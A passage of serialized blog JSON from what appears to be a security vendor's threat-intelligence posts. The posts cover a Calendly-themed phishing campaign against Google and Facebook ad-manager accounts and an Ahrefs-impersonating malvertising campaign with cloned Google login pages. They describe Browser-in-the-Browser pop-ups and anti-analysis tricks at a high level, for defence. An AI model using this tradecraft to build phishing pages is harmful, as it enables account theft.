",{"data":41973,"content":41977,"nodeType":312},{"target":41974},{"sys":41975},{"id":41976,"type":317,"linkType":318},"5PFRI9XtNVdkpYiRoIYpF",[],{"data":41979,"content":41980,"nodeType":231},{},[],{"data":41982,"content":41983,"nodeType":169},{},[41984],{"data":41985,"marks":41986,"value":41988,"nodeType":173},{},[41987],{"type":370},"Variant 3: Targeting both Google and Facebook accounts",{"data":41990,"content":41991,"nodeType":178},{},[41992],{"data":41993,"marks":41994,"value":41995,"nodeType":173},{},[],"We also discovered a third, more recent variant targeting both Google and Facebook accounts with Calendly-styled pages.",{"data":41997,"content":41998,"nodeType":178},{},[41999,42003,42012],{"data":42000,"marks":42001,"value":42002,"nodeType":173},{},[],"This variant looks to leverage a Browser-in-the-Browser style pop-up window similar to the ",{"data":42004,"content":42006,"nodeType":186},{"uri":42005},"https://pushsecurity.com/blog/analyzing-the-latest-sneaky2fa-phishing-page/",[42007],{"data":42008,"marks":42009,"value":42011,"nodeType":173},{},[42010],{"type":194},"Sneaky2FA attacks we reported on recently",{"data":42013,"marks":42014,"value":42015,"nodeType":173},{},[],". BITB allows the attacker to mask the phishing page URL by presenting a fake URL set by the attacker, inside a pop-up login window. ",{"data":42017,"content":42021,"nodeType":312},{"target":42018},{"sys":42019},{"id":42020,"type":317,"linkType":318},"7w4cmyqPvhxAFrokaK9CE1",[],{"data":42023,"content":42027,"nodeType":312},{"target":42024},{"sys":42025},{"id":42026,"type":317,"linkType":318},"6FUSNecz0BXLxJxoJTsALD",[],{"data":42029,"content":42033,"nodeType":312},{"target":42030},{"sys":42031},{"id":42032,"type":317,"linkType":318},"2zwFDrgsLuxi4Xv2q0nPFK",[],{"data":42035,"content":42036,"nodeType":178},{},[42037],{"data":42038,"marks":42039,"value":42040,"nodeType":173},{},[],"The attacker also implemented additional anti-analysis functionality, beyond the specific domain targeting we observed in the first page variant — the result of which meant the page IP blocked us from interacting with it further. ",{"data":42042,"content":42046,"nodeType":312},{"target":42043},{"sys":42044},{"id":42045,"type":317,"linkType":318},"3ZPdxi5cGZcn5hF1ISIUa7",[],{"data":42048,"content":42052,"nodeType":312},{"target":42049},{"sys":42050},{"id":42051,"type":317,"linkType":318},"3J5pmgNL9LevE1FdX4oksf",[],{"data":42054,"content":42055,"nodeType":178},{},[42056,42060,42069],{"data":42057,"marks":42058,"value":42059,"nodeType":173},{},[],"Often ",{"data":42061,"content":42063,"nodeType":186},{"uri":42062},"https://phishing-techniques.pushsecurity.com/techniques/anti-sandbox/",[42064],{"data":42065,"marks":42066,"value":42068,"nodeType":173},{},[42067],{"type":194},"accessing dev tools",{"data":42070,"marks":42071,"value":42072,"nodeType":173},{},[]," on a page is enough to trigger this, specifically targeting security analysts and web-crawling security bots/tools. ",{"data":42074,"content":42075,"nodeType":231},{},[],{"data":42077,"content":42078,"nodeType":169},{},[42079],{"data":42080,"marks":42081,"value":42083,"nodeType":173},{},[42082],{"type":370},"Why are attackers targeting business ad management accounts?",{"data":42085,"content":42086,"nodeType":178},{},[42087,42091,42099],{"data":42088,"marks":42089,"value":42090,"nodeType":173},{},[],"The campaign shows signs of being a long-running, targeted initiative focused on compromising accounts responsible for managing digital ads on behalf of businesses. The attackers have demonstrated that they are continuing to iterate on their TTPs, introducing new page styles with increased sophistication, and new ",{"data":42092,"content":42094,"nodeType":186},{"uri":42093},"https://phishing-techniques.pushsecurity.com/#techniques-table",[42095],{"data":42096,"marks":42097,"value":8157,"nodeType":173},{},[42098],{"type":194},{"data":42100,"marks":42101,"value":42102,"nodeType":173},{},[]," to defeat security analysis tools.  ",{"data":42104,"content":42108,"nodeType":312},{"target":42105},{"sys":42106},{"id":42107,"type":317,"linkType":318},"m5GsTsDb55T70MU2m72B1",[],{"data":42110,"content":42111,"nodeType":178},{},[42112],{"data":42113,"marks":42114,"value":42115,"nodeType":173},{},[],"We also discovered that Google recently issued a security warning specifically for agency organizations managing ads for a number of businesses, urging them to create security alerts whenever a new account is added to a Manager Account (MCC) used to view and manage multiple Google Ads accounts from a single view. ",{"data":42117,"content":42118,"nodeType":178},{},[42119,42122,42129],{"data":42120,"marks":42121,"value":41484,"nodeType":173},{},[],{"data":42123,"content":42124,"nodeType":186},{"uri":1842},[42125],{"data":42126,"marks":42127,"value":1845,"nodeType":173},{},[42128],{"type":194},{"data":42130,"marks":42131,"value":41495,"nodeType":173},{},[],{"data":42133,"content":42134,"nodeType":235},{},[42135],{"data":42136,"marks":42137,"value":42139,"nodeType":173},{},[42138],{"type":370},"Why are attackers turning to malvertising?",{"data":42141,"content":42142,"nodeType":178},{},[42143],{"data":42144,"marks":42145,"value":42146,"nodeType":173},{},[],"Malvertising attacks delivered over search engines (e.g. Google Search) and social media apps (Facebook, LinkedIn, etc.) are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",{"data":42148,"content":42149,"nodeType":178},{},[42150],{"data":42151,"marks":42152,"value":42153,"nodeType":173},{},[],"The flipside of this is that malvertising attacks are less likely to be targeted than phishing delivered directly to the victim via a direct message (i.e. email, social media DM, instant messenger app, SMS, etc.). ",{"data":42155,"content":42156,"nodeType":178},{},[42157],{"data":42158,"marks":42159,"value":41463,"nodeType":173},{},[],{"data":42161,"content":42162,"nodeType":178},{},[42163,42167,42174],{"data":42164,"marks":42165,"value":42166,"nodeType":173},{},[],"Malvertising is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":42168,"content":42169,"nodeType":186},{"uri":5002},[42170],{"data":42171,"marks":42172,"value":6811,"nodeType":173},{},[42173],{"type":194},{"data":42175,"marks":42176,"value":42177,"nodeType":173},{},[],"” criminal collective, all of which began with identity-based initial access). For this reason, credentials and access are an increasingly profitable commodity for cyber criminals. ",{"data":42179,"content":42180,"nodeType":235},{},[42181],{"data":42182,"marks":42183,"value":42185,"nodeType":173},{},[42184],{"type":370},"Additional considerations",{"data":42187,"content":42188,"nodeType":178},{},[42189],{"data":42190,"marks":42191,"value":42192,"nodeType":173},{},[],"As previously mentioned, compromising a Google Workspace account (particularly where it is the primary enterprise cloud platform used by the organization) provides comprehensive access to business apps, data, and functionality that can be exploited by attackers — effectively, it’s the access point to modern business IT. There’s a good chance that attackers establishing a foothold in this way would look to leverage this access further, or at least sell on that access to a criminal group looking to take the attack further. ",{"data":42194,"content":42198,"nodeType":312},{"target":42195},{"sys":42196},{"id":42197,"type":317,"linkType":318},"7jnQqRk0JuqEtrQ3HXy3f8",[],{"data":42200,"content":42201,"nodeType":231},{},[],{"data":42203,"content":42204,"nodeType":169},{},[42205],{"data":42206,"marks":42207,"value":8406,"nodeType":173},{},[42208],{"type":370},{"data":42210,"content":42211,"nodeType":178},{},[42212],{"data":42213,"marks":42214,"value":42215,"nodeType":173},{},[],"We have opted not to provide the domains associated with that campaign to preserve the privacy of the individuals being impersonated by the attacker. In many cases, their full name was included in the URL for the phishing page, while their name and profile picture (most likely scraped from LinkedIn) are also visible on the landing page. ",{"data":42217,"content":42218,"nodeType":178},{},[42219],{"data":42220,"marks":42221,"value":41621,"nodeType":173},{},[],{"data":42223,"content":42224,"nodeType":231},{},[],{"data":42226,"content":42227,"nodeType":169},{},[42228],{"data":42229,"marks":42230,"value":2824,"nodeType":173},{},[42231],{"type":370},{"data":42233,"content":42234,"nodeType":178},{},[42235],{"data":42236,"marks":42237,"value":42238,"nodeType":173},{},[],"Push researchers are continuously analysing and developing new detections based on the latest phishing kits and TTPs which enables us to stay two steps ahead of attackers.",{"data":42240,"content":42241,"nodeType":178},{},[42242],{"data":42243,"marks":42244,"value":1444,"nodeType":173},{},[],{"data":42246,"content":42247,"nodeType":178},{},[42248,42251,42258,42261,42268],{"data":42249,"marks":42250,"value":1451,"nodeType":173},{},[],{"data":42252,"content":42253,"nodeType":186},{"uri":1456},[42254],{"data":42255,"marks":42256,"value":1459,"nodeType":173},{},[42257],{"type":194},{"data":42259,"marks":42260,"value":1464,"nodeType":173},{},[],{"data":42262,"content":42263,"nodeType":186},{"uri":1469},[42264],{"data":42265,"marks":42266,"value":1472,"nodeType":173},{},[42267],{"type":194},{"data":42269,"marks":42270,"value":1477,"nodeType":173},{},[],{"data":42272,"content":42275,"nodeType":312},{"target":42273},{"sys":42274},{"id":8590,"type":317,"linkType":318},[],{"data":42277,"content":42278,"nodeType":178},{},[42279],{"data":42280,"marks":42281,"value":37,"nodeType":173},{},[],"Uncovering a Calendly-themed phishing campaign targeting business ad manager accounts","Investigating a phishing campaign targeting Google Ads Manager MCC accounts to propagate malvertising lures. ","uncovering-a-calendly-themed-phishing-campaign",{"items":42286},[42287,42289],{"sys":42288,"name":505},{"id":504},{"sys":42290,"name":509},{"id":508},{"items":42292},[42293],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":42294},{"url":8615},{"items":42296},[42297],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":42298},{"url":1496},{"json":42300,"links":42828},{"nodeType":165,"data":42301,"content":42302},{},[42303,42309,42315,42356,42361,42367,42373,42378,42383,42388,42391,42398,42404,42409,42415,42420,42425,42431,42436,42451,42454,42461,42467,42473,42479,42485,42490,42505,42508,42515,42521,42567,42573,42579,42582,42589,42595,42601,42607,42633,42636,42643,42659,42665,42704,42710,42749,42755,42821],{"nodeType":178,"data":42304,"content":42305},{},[42306],{"nodeType":173,"value":13992,"marks":42307,"data":42308},[],{},{"nodeType":178,"data":42310,"content":42311},{},[42312],{"nodeType":173,"value":13999,"marks":42313,"data":42314},[],{},{"nodeType":250,"data":42316,"content":42317},{},[42318,42337],{"nodeType":254,"data":42319,"content":42320},{},[42321],{"nodeType":178,"data":42322,"content":42323},{},[42324,42327,42334],{"nodeType":173,"value":14012,"marks":42325,"data":42326},[],{},{"nodeType":186,"data":42328,"content":42329},{"uri":14017},[42330],{"nodeType":173,"value":14020,"marks":42331,"data":42333},[42332],{"type":194},{},{"nodeType":173,"value":14025,"marks":42335,"data":42336},[],{},{"nodeType":254,"data":42338,"content":42339},{},[42340],{"nodeType":178,"data":42341,"content":42342},{},[42343,42346,42353],{"nodeType":173,"value":14035,"marks":42344,"data":42345},[],{},{"nodeType":186,"data":42347,"content":42348},{"uri":14040},[42349],{"nodeType":173,"value":14043,"marks":42350,"data":42352},[42351],{"type":194},{},{"nodeType":173,"value":14048,"marks":42354,"data":42355},[],{},{"nodeType":312,"data":42357,"content":42360},{"target":42358},{"sys":42359},{"id":14055,"type":317,"linkType":318},[],{"nodeType":178,"data":42362,"content":42363},{},[42364],{"nodeType":173,"value":14061,"marks":42365,"data":42366},[],{},{"nodeType":178,"data":42368,"content":42369},{},[42370],{"nodeType":173,"value":14068,"marks":42371,"data":42372},[],{},{"nodeType":312,"data":42374,"content":42377},{"target":42375},{"sys":42376},{"id":14075,"type":317,"linkType":318},[],{"nodeType":312,"data":42379,"content":42382},{"target":42380},{"sys":42381},{"id":14081,"type":317,"linkType":318},[],{"nodeType":312,"data":42384,"content":42387},{"target":42385},{"sys":42386},{"id":14087,"type":317,"linkType":318},[],{"nodeType":231,"data":42389,"content":42390},{},[],{"nodeType":169,"data":42392,"content":42393},{},[42394],{"nodeType":173,"value":14096,"marks":42395,"data":42397},[42396],{"type":370},{},{"nodeType":178,"data":42399,"content":42400},{},[42401],{"nodeType":173,"value":14104,"marks":42402,"data":42403},[],{},{"nodeType":312,"data":42405,"content":42408},{"target":42406},{"sys":42407},{"id":14111,"type":317,"linkType":318},[],{"nodeType":178,"data":42410,"content":42411},{},[42412],{"nodeType":173,"value":14117,"marks":42413,"data":42414},[],{},{"nodeType":312,"data":42416,"content":42419},{"target":42417},{"sys":42418},{"id":14124,"type":317,"linkType":318},[],{"nodeType":312,"data":42421,"content":42424},{"target":42422},{"sys":42423},{"id":14130,"type":317,"linkType":318},[],{"nodeType":178,"data":42426,"content":42427},{},[42428],{"nodeType":173,"value":14136,"marks":42429,"data":42430},[],{},{"nodeType":312,"data":42432,"content":42435},{"target":42433},{"sys":42434},{"id":14143,"type":317,"linkType":318},[],{"nodeType":178,"data":42437,"content":42438},{},[42439,42442,42448],{"nodeType":173,"value":14149,"marks":42440,"data":42441},[],{},{"nodeType":186,"data":42443,"content":42444},{"uri":14017},[42445],{"nodeType":173,"value":14156,"marks":42446,"data":42447},[],{},{"nodeType":173,"value":197,"marks":42449,"data":42450},[],{},{"nodeType":231,"data":42452,"content":42453},{},[],{"nodeType":169,"data":42455,"content":42456},{},[42457],{"nodeType":173,"value":14169,"marks":42458,"data":42460},[42459],{"type":370},{},{"nodeType":178,"data":42462,"content":42463},{},[42464],{"nodeType":173,"value":14177,"marks":42465,"data":42466},[],{},{"nodeType":178,"data":42468,"content":42469},{},[42470],{"nodeType":173,"value":14184,"marks":42471,"data":42472},[],{},{"nodeType":178,"data":42474,"content":42475},{},[42476],{"nodeType":173,"value":14191,"marks":42477,"data":42478},[],{},{"nodeType":178,"data":42480,"content":42481},{},[42482],{"nodeType":173,"value":14198,"marks":42483,"data":42484},[],{},{"nodeType":312,"data":42486,"content":42489},{"target":42487},{"sys":42488},{"id":14205,"type":317,"linkType":318},[],{"nodeType":178,"data":42491,"content":42492},{},[42493,42496,42502],{"nodeType":173,"value":14211,"marks":42494,"data":42495},[],{},{"nodeType":186,"data":42497,"content":42498},{"uri":14216},[42499],{"nodeType":173,"value":14219,"marks":42500,"data":42501},[],{},{"nodeType":173,"value":197,"marks":42503,"data":42504},[],{},{"nodeType":231,"data":42506,"content":42507},{},[],{"nodeType":169,"data":42509,"content":42510},{},[42511],{"nodeType":173,"value":14232,"marks":42512,"data":42514},[42513],{"type":370},{},{"nodeType":178,"data":42516,"content":42517},{},[42518],{"nodeType":173,"value":14240,"marks":42519,"data":42520},[],{},{"nodeType":178,"data":42522,"content":42523},{},[42524,42527,42534,42537,42544,42547,42554,42557,42564],{"nodeType":173,"value":14247,"marks":42525,"data":42526},[],{},{"nodeType":186,"data":42528,"content":42529},{"uri":1842},[42530],{"nodeType":173,"value":1845,"marks":42531,"data":42533},[42532],{"type":194},{},{"nodeType":173,"value":14258,"marks":42535,"data":42536},[],{},{"nodeType":186,"data":42538,"content":42539},{"uri":14263},[42540],{"nodeType":173,"value":14266,"marks":42541,"data":42543},[42542],{"type":194},{},{"nodeType":173,"value":2936,"marks":42545,"data":42546},[],{},{"nodeType":186,"data":42548,"content":42549},{"uri":14275},[42550],{"nodeType":173,"value":14278,"marks":42551,"data":42553},[42552],{"type":194},{},{"nodeType":173,"value":9534,"marks":42555,"data":42556},[],{},{"nodeType":186,"data":42558,"content":42559},{"uri":14287},[42560],{"nodeType":173,"value":14290,"marks":42561,"data":42563},[42562],{"type":194},{},{"nodeType":173,"value":14295,"marks":42565,"data":42566},[],{},{"nodeType":178,"data":42568,"content":42569},{},[42570],{"nodeType":173,"value":14302,"marks":42571,"data":42572},[],{},{"nodeType":178,"data":42574,"content":42575},{},[42576],{"nodeType":173,"value":14309,"marks":42577,"data":42578},[],{},{"nodeType":231,"data":42580,"content":42581},{},[],{"nodeType":169,"data":42583,"content":42584},{},[42585],{"nodeType":173,"value":8517,"marks":42586,"data":42588},[42587],{"type":370},{},{"nodeType":178,"data":42590,"content":42591},{},[42592],{"nodeType":173,"value":14326,"marks":42593,"data":42594},[],{},{"nodeType":178,"data":42596,"content":42597},{},[42598],{"nodeType":173,"value":14333,"marks":42599,"data":42600},[],{},{"nodeType":178,"data":42602,"content":42603},{},[42604],{"nodeType":173,"value":14340,"marks":42605,"data":42606},[],{},{"nodeType":178,"data":42608,"content":42609},{},[42610,42613,42620,42623,42630],{"nodeType":173,"value":1451,"marks":42611,"data":42612},[],{},{"nodeType":186,"data":42614,"content":42615},{"uri":1456},[42616],{"nodeType":173,"value":1459,"marks":42617,"data":42619},[42618],{"type":194},{},{"nodeType":173,"value":1464,"marks":42621,"data":42622},[],{},{"nodeType":186,"data":42624,"content":42625},{"uri":1469},[42626],{"nodeType":173,"value":1472,"marks":42627,"data":42629},[42628],{"type":194},{},{"nodeType":173,"value":1477,"marks":42631,"data":42632},[],{},{"nodeType":231,"data":42634,"content":42635},{},[],{"nodeType":169,"data":42637,"content":42638},{},[42639],{"nodeType":173,"value":8406,"marks":42640,"data":42642},[42641],{"type":370},{},{"nodeType":178,"data":42644,"content":42645},{},[42646,42649,42656],{"nodeType":173,"value":8414,"marks":42647,"data":42648},[],{},{"nodeType":186,"data":42650,"content":42651},{"uri":8419},[42652],{"nodeType":173,"value":8422,"marks":42653,"data":42655},[42654],{"type":194},{},{"nodeType":173,"value":8427,"marks":42657,"data":42658},[],{},{"nodeType":178,"data":42660,"content":42661},{},[42662],{"nodeType":173,"value":14399,"marks":42663,"data":42664},[],{},{"nodeType":250,"data":42666,"content":42667},{},[42668,42677,42686,42695],{"nodeType":254,"data":42669,"content":42670},{},[42671],{"nodeType":178,"data":42672,"content":42673},{},[42674],{"nodeType":173,"value":14412,"marks":42675,"data":42676},[],{},{"nodeType":254,"data":42678,"content":42679},{},[42680],{"nodeType":178,"data":42681,"content":42682},{},[42683],{"nodeType":173,"value":14422,"marks":42684,"data":42685},[],{},{"nodeType":254,"data":42687,"content":42688},{},[42689],{"nodeType":178,"data":42690,"content":42691},{},[42692],{"nodeType":173,"value":14432,"marks":42693,"data":42694},[],{},{"nodeType":254,"data":42696,"content":42697},{},[42698],{"nodeType":178,"data":42699,"content":42700},{},[42701],{"nodeType":173,"value":14442,"marks":42702,"data":42703},[],{},{"nodeType":178,"data":42705,"content":42706},{},[42707],{"nodeType":173,"value":14449,"marks":42708,"data":42709},[],{},{"nodeType":250,"data":42711,"content":42712},{},[42713,42722,42731,42740],{"nodeType":254,"data":42714,"content":42715},{},[42716],{"nodeType":178,"data":42717,"content":42718},{},[42719],{"nodeType":173,"value":14462,"marks":42720,"data":42721},[],{},{"nodeType":254,"data":42723,"content":42724},{},[42725],{"nodeType":178,"data":42726,"content":42727},{},[42728],{"nodeType":173,"value":14472,"marks":42729,"data":42730},[],{},{"nodeType":254,"data":42732,"content":42733},{},[42734],{"nodeType":178,"data":42735,"content":42736},{},[42737],{"nodeType":173,"value":14482,"marks":42738,"data":42739},[],{},{"nodeType":254,"data":42741,"content":42742},{},[42743],{"nodeType":178,"data":42744,"content":42745},{},[42746],{"nodeType":173,"value":14492,"marks":42747,"data":42748},[],{},{"nodeType":178,"data":42750,"content":42751},{},[42752],{"nodeType":173,"value":14499,"marks":42753,"data":42754},[],{},{"nodeType":250,"data":42756,"content":42757},{},[42758,42767,42776,42785,42794,42803,42812],{"nodeType":254,"data":42759,"content":42760},{},[42761],{"nodeType":178,"data":42762,"content":42763},{},[42764],{"nodeType":173,"value":14512,"marks":42765,"data":42766},[],{},{"nodeType":254,"data":42768,"content":42769},{},[42770],{"nodeType":178,"data":42771,"content":42772},{},[42773],{"nodeType":173,"value":14522,"marks":42774,"data":42775},[],{},{"nodeType":254,"data":42777,"content":42778},{},[42779],{"nodeType":178,"data":42780,"content":42781},{},[42782],{"nodeType":173,"value":14532,"marks":42783,"data":42784},[],{},{"nodeType":254,"data":42786,"content":42787},{},[42788],{"nodeType":178,"data":42789,"content":42790},{},[42791],{"nodeType":173,"value":14542,"marks":42792,"data":42793},[],{},{"nodeType":254,"data":42795,"content":42796},{},[42797],{"nodeType":178,"data":42798,"content":42799},{},[42800],{"nodeType":173,"value":14552,"marks":42801,"data":42802},[],{},{"nodeType":254,"data":42804,"content":42805},{},[42806],{"nodeType":178,"data":42807,"content":42808},{},[42809],{"nodeType":173,"value":14562,"marks":42810,"data":42811},[],{},{"nodeType":254,"data":42813,"content":42814},{},[42815],{"nodeType":178,"data":42816,"content":42817},{},[42818],{"nodeType":173,"value":14572,"marks":42819,"data":42820},[],{},{"nodeType":178,"data":42822,"content":42823},{},[42824],{"nodeType":173,"value":14579,"marks":42825,"data":42827},[42826],{"type":370},{},{"entries":42829},{"hyperlink":42830,"inline":42831,"block":42832},[],[],[42833,42839,42843,42869,42873,42880,42905,42910,42915],{"sys":42834,"__typename":5345,"title":42835,"caption":42835,"layoutMode":118,"file":42836},{"id":14055},"We reported on this campaign running malicious ads for “Google Ads” in December.",{"url":42837,"width":5358,"height":42838},"https://images.ctfassets.net/y1cdw1ablpvd/4thOH70HwzZnhzWcU2zUAP/cf64ff8825037b233d5ab34bdb11d97f/image4.png",1205,{"sys":42840,"__typename":5434,"title":42841,"arcadeDemoUrl":42842,"playText":15224},{"id":14075},"Ahrefs Malvertising Attack Demo","https://demo.arcade.software/9O3tGrFzckBbTlRSnyEK?embed",{"sys":42844,"__typename":5311,"content":42845,"name":42868,"title":118},{"id":14081},{"json":42846},{"nodeType":165,"data":42847,"content":42848},{},[42849,42861],{"nodeType":178,"data":42850,"content":42851},{},[42852,42857],{"nodeType":173,"value":42853,"marks":42854,"data":42856},"Update 24th February: ",[42855],{"type":370},{},{"nodeType":173,"value":42858,"marks":42859,"data":42860},"We discovered additional activity relating to this campaign with more Ahrefs malvertising on Google Search, this time pointing to fake domains hosted on surge[.]sh. We also blocked Push customers from interacting with a similar ad impersonating Semrush, also hosted on surge[.]sh. ",[],{},{"nodeType":178,"data":42862,"content":42863},{},[42864],{"nodeType":173,"value":42865,"marks":42866,"data":42867},"New IoCs have been added and you can see a video of this new attack below. ",[],{},"Ahrefs malvertising insight box 3",{"sys":42870,"__typename":5434,"title":42871,"arcadeDemoUrl":42872,"playText":15224},{"id":14087},"Ahrefs Malvertising v2","https://demo.arcade.software/3QIKy5x7kmMd0oSrFeOB?embed",{"sys":42874,"__typename":5345,"title":42875,"caption":42876,"layoutMode":118,"file":42877},{"id":14111},"Ahrefs malvertising lure","Ahrefs malvertising link featured on Google Search under \"Sponsored Results\"",{"url":42878,"width":5358,"height":42879},"https://images.ctfassets.net/y1cdw1ablpvd/6pfKxxRmvykxJ2t5xFJmpz/fc8d3d65b22beea965f1a45dae0b249c/image1.png",1126,{"sys":42881,"__typename":5311,"content":42882,"name":42904,"title":118},{"id":14124},{"json":42883},{"data":42884,"content":42885,"nodeType":165},{},[42886],{"data":42887,"content":42888,"nodeType":178},{},[42889,42893,42901],{"data":42890,"marks":42891,"value":42892,"nodeType":173},{},[],"Notably, the site’s language is set to Brazilian Portuguese in the HTML (lang=\"pt-BR\"). Based on this, the campaign is likely linked to the same threat actors ",{"data":42894,"content":42895,"nodeType":186},{"uri":40781},[42896],{"data":42897,"marks":42898,"value":42900,"nodeType":173},{},[42899],{"type":194},"reported by MalwareBytes in January 2025",{"data":42902,"marks":42903,"value":197,"nodeType":173},{},[],"Ahrefs malvertising insight box 1",{"sys":42906,"__typename":5345,"title":42907,"caption":42907,"layoutMode":118,"file":42908},{"id":14130},"Fake Ahrefs landing page",{"url":42909,"width":5358,"height":42879},"https://images.ctfassets.net/y1cdw1ablpvd/6vlPpGpLhMOTo5ijMxZav0/bfe816a0f301914d334ec9db9dfa56b1/image2.png",{"sys":42911,"__typename":5345,"title":42912,"caption":42912,"layoutMode":118,"file":42913},{"id":14143},"Cloned Google login page used to perform AITM phishing",{"url":42914,"width":5358,"height":42879},"https://images.ctfassets.net/y1cdw1ablpvd/5uh2f3ONpNQgMssDfdtALK/1edd93a6365e60049a01367b7b7b9448/image4.png",{"sys":42916,"__typename":5311,"content":42917,"name":42954,"title":118},{"id":14205},{"json":42918},{"nodeType":165,"data":42919,"content":42920},{},[42921,42928,42935],{"nodeType":178,"data":42922,"content":42923},{},[42924],{"nodeType":173,"value":42925,"marks":42926,"data":42927},"It’s also worth noting that a Google Ad Manager account is also an enterprise SSO account that can be used to access broader Google Workspace services and any connected apps that are SSO-enabled. ",[],{},{"nodeType":178,"data":42929,"content":42930},{},[42931],{"nodeType":173,"value":42932,"marks":42933,"data":42934},"Even if the victim isn’t predominantly a Google house, a Google account using the same email as a different identity provider account (e.g. Microsoft) can still be used to access downstream apps via SSO. This is because most apps use email as an identifier, while 3 in 5 apps also allow you to access an account using a new login method without doing any further verification checks. ",[],{},{"nodeType":178,"data":42936,"content":42937},{},[42938,42942,42950],{"nodeType":173,"value":40820,"marks":42939,"data":42941},[42940],{"type":370},{},{"nodeType":186,"data":42943,"content":42944},{"uri":40823},[42945],{"nodeType":173,"value":40830,"marks":42946,"data":42949},[42947,42948],{"type":194},{"type":370},{},{"nodeType":173,"value":40835,"marks":42951,"data":42953},[42952],{"type":370},{},"Ahrefs malvertising insight box 2","content:blog:google-search-malvertising-campaign-continues-now-impersonating-ahrefs.json","blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs.json","blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"_path":42959,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":42960,"ogImage":118,"summary":42962,"title":25185,"subtitle":118,"metaTitle":42973,"synopsis":25186,"hashTags":118,"publishedDate":25187,"slug":25188,"tagsCollection":42974,"relatedBlogPostsCollection":42980,"authorsCollection":45151,"content":45155,"_id":46415,"_type":5439,"_source":5440,"_file":46416,"_stem":46417,"_extension":5439},"/blog/taking-the-fight-to-attackers-top-features-of-2025",{"id":23904,"publishedAt":42961},"2025-12-17T07:50:40.948Z",{"json":42963},{"data":42964,"content":42965,"nodeType":165},{},[42966],{"data":42967,"content":42968,"nodeType":178},{},[42969],{"data":42970,"marks":42971,"value":42972,"nodeType":173},{},[],"Here’s how real-world attacks and our own R&D informed what we built this year.","Push features we built in 2025 to stop browser-based attacks",{"items":42975},[42976,42978],{"sys":42977,"name":509},{"id":508},{"sys":42979,"name":505},{"id":504},{"items":42981},[42982,43810,44558],{"__typename":1528,"sys":42983,"content":42984,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":43800,"authorsCollection":43806},{"id":519},{"json":42985},{"nodeType":165,"data":42986,"content":42987},{},[42988,42994,43000,43006,43009,43016,43022,43028,43033,43039,43044,43060,43066,43076,43079,43086,43092,43105,43111,43121,43126,43129,43136,43143,43148,43156,43172,43180,43186,43194,43209,43217,43223,43231,43257,43265,43271,43279,43295,43300,43308,43314,43322,43355,43358,43365,43373,43389,43397,43403,43411,43437,43442,43450,43456,43461,43464,43471,43479,43485,43536,43541,43544,43551,43559,43565,43570,43573,43580,43586,43592,43652,43658,43713,43719,43722,43729,43735,43741,43746,43749,43756,43762,43768,43774],{"nodeType":178,"data":42989,"content":42990},{},[42991],{"nodeType":173,"value":528,"marks":42992,"data":42993},[],{},{"nodeType":178,"data":42995,"content":42996},{},[42997],{"nodeType":173,"value":535,"marks":42998,"data":42999},[],{},{"nodeType":178,"data":43001,"content":43002},{},[43003],{"nodeType":173,"value":542,"marks":43004,"data":43005},[],{},{"nodeType":231,"data":43007,"content":43008},{},[],{"nodeType":169,"data":43010,"content":43011},{},[43012],{"nodeType":173,"value":552,"marks":43013,"data":43015},[43014],{"type":370},{},{"nodeType":178,"data":43017,"content":43018},{},[43019],{"nodeType":173,"value":560,"marks":43020,"data":43021},[],{},{"nodeType":178,"data":43023,"content":43024},{},[43025],{"nodeType":173,"value":567,"marks":43026,"data":43027},[],{},{"nodeType":312,"data":43029,"content":43032},{"target":43030},{"sys":43031},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":43034,"content":43035},{},[43036],{"nodeType":173,"value":580,"marks":43037,"data":43038},[],{},{"nodeType":312,"data":43040,"content":43043},{"target":43041},{"sys":43042},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":43045,"content":43046},{},[43047,43050,43057],{"nodeType":173,"value":593,"marks":43048,"data":43049},[],{},{"nodeType":186,"data":43051,"content":43052},{"uri":598},[43053],{"nodeType":173,"value":601,"marks":43054,"data":43056},[43055],{"type":194},{},{"nodeType":173,"value":606,"marks":43058,"data":43059},[],{},{"nodeType":178,"data":43061,"content":43062},{},[43063],{"nodeType":173,"value":613,"marks":43064,"data":43065},[],{},{"nodeType":178,"data":43067,"content":43068},{},[43069,43072],{"nodeType":173,"value":620,"marks":43070,"data":43071},[],{},{"nodeType":173,"value":624,"marks":43073,"data":43075},[43074],{"type":370},{},{"nodeType":231,"data":43077,"content":43078},{},[],{"nodeType":169,"data":43080,"content":43081},{},[43082],{"nodeType":173,"value":635,"marks":43083,"data":43085},[43084],{"type":370},{},{"nodeType":178,"data":43087,"content":43088},{},[43089],{"nodeType":173,"value":643,"marks":43090,"data":43091},[],{},{"nodeType":178,"data":43093,"content":43094},{},[43095,43098,43102],{"nodeType":173,"value":650,"marks":43096,"data":43097},[],{},{"nodeType":173,"value":654,"marks":43099,"data":43101},[43100],{"type":370},{},{"nodeType":173,"value":659,"marks":43103,"data":43104},[],{},{"nodeType":178,"data":43106,"content":43107},{},[43108],{"nodeType":173,"value":666,"marks":43109,"data":43110},[],{},{"nodeType":178,"data":43112,"content":43113},{},[43114,43117],{"nodeType":173,"value":673,"marks":43115,"data":43116},[],{},{"nodeType":173,"value":677,"marks":43118,"data":43120},[43119],{"type":370},{},{"nodeType":312,"data":43122,"content":43125},{"target":43123},{"sys":43124},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":43127,"content":43128},{},[],{"nodeType":169,"data":43130,"content":43131},{},[43132],{"nodeType":173,"value":694,"marks":43133,"data":43135},[43134],{"type":370},{},{"nodeType":235,"data":43137,"content":43138},{},[43139],{"nodeType":173,"value":702,"marks":43140,"data":43142},[43141],{"type":370},{},{"nodeType":312,"data":43144,"content":43147},{"target":43145},{"sys":43146},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":43149,"content":43150},{},[43151],{"nodeType":173,"value":716,"marks":43152,"data":43155},[43153,43154],{"type":370},{"type":194},{},{"nodeType":178,"data":43157,"content":43158},{},[43159,43162,43169],{"nodeType":173,"value":725,"marks":43160,"data":43161},[],{},{"nod